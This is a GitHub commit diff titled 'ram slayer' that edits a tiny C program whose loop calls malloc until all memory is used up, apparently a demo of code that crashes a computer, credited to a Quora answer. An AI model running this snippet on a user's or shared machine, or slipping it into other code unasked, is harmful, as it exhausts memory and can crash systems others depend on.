ram slayer

This commit is contained in:
Minhas Kamal
2016-12-14 07:47:21 +06:00
committed by GitHub
parent 29a9a03722
commit 931919b671

View File

@@ -1,7 +1,6 @@
// Source: https://www.quora.com/What-is-your-smallest-piece-of-code-that-can-crash-the-computer/answer/George-Gonzalez-5?srid=u2HNX
// Usees up all of RAM.
// Usees up all space of RAM.
int main(){
main(){
while(malloc(1000));
return 0;
}